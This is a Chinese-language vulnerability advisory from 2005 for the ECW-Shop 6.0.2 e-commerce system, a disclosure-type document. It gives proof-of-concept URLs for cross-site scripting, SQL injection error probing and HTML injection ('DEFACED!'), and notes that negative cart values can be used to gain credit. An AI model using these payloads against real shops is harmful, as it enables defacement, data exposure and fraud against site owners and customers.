添加时间:
2005-08-17

系统编号:
WAVDB-00496
BUGTRAQ: 14576

影响版本:
ECW-Shop 6.0.2

程序介绍:

ECW-Shop是一款电子商务购物系统，允许在数据库中使用Excel或Access格式。

漏洞分析:

ECW Shop中存在多个SQL注入漏洞，远程攻击者可以利用这些漏洞导致跨站脚本、信息泄漏、HTML注入等多种攻击。
起因是没有正确的过滤用户输入。

漏洞利用:

跨站脚本：

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script>

信息泄漏和可能的SQL注入:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='

Error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109

HTML注入:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&id=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&max=1

购物车/订单控制:

可以向购物车中添加负值获得信用.

解决方案:
厂商补丁：
Soft4e
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.soft4e.com/shop.html<br> 

信息来源:
<*来源：John Cobb （johnc@nobytes.com）
   链接：http://marc.theaimsgroup.com/?l=bugtraq&m=112421209919985&w=2
*>